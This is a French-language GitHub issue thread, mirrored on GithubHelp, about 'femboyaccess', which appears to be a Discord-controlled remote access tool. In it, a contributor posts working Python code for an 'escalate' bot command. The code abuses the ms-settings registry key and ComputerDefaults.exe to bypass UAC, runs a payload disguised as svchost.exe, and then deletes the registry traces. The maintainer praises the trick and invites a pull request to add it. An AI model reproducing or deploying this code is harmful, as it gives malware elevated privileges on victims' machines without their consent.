GithubHelp home page GithubHelp logo

besoin d'aide 😅 about femboyaccess HOT 3 CLOSED

ambr0sial avatar ambr0sial commented on August 15, 2024
besoin d'aide 😅

from femboyaccess.

Comments (3)

ambr0sial avatar ambr0sial commented on August 15, 2024

coucouu!! désolée je vois pas vraiment de quoi tu veux parler- quel path exactement??

from femboyaccess.

StuKit avatar StuKit commented on August 15, 2024

update : j'ai fini par utiliser une autre méthode de privilege escalation qui je trouve est plus rapide et plus direct via un module déjà présent
voilà si tu veux le modifier & l'intégrer :

        if message.content.startswith("escalate"):
            usr = os.getlogin()
            dst = f"C:\\Users\\{usr}\\AppData\\Local\\.cache\\svchost.exe"
            location = winreg.HKEY_CURRENT_USER
            key = winreg.CreateKey(winreg.HKEY_CURRENT_USER, 'SOFTWARE\\Classes\\ms-settings\\shell\\open\\command')
            soft = winreg.OpenKeyEx(location, r"SOFTWARE\\Classes\\ms-settings\\shell\\open\\")
            key_1 = winreg.CreateKey(soft, "command")
            
            winreg.SetValueEx(key_1, "", 0, winreg.REG_SZ,
                           dst)
            winreg.SetValueEx(key_1, "DelegateExecute", 0, winreg.REG_SZ,
                           "")
            os.system('''powershell Start-Process "C:\Windows\System32\ComputerDefaults.exe"''')
            os.system('''powershell Remove-Item "HKCU:\software\classes\ms-settings" -force -Recurse -ErrorAction Ignore''')
            if key_1:
                winreg.CloseKey(key_1)
            sys.exit()

from femboyaccess.

ambr0sial avatar ambr0sial commented on August 15, 2024

ingénieux mdrr, si tu veux tu peux faire une pull request pour l'ajouter!

from femboyaccess.

Related Issues (8)

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.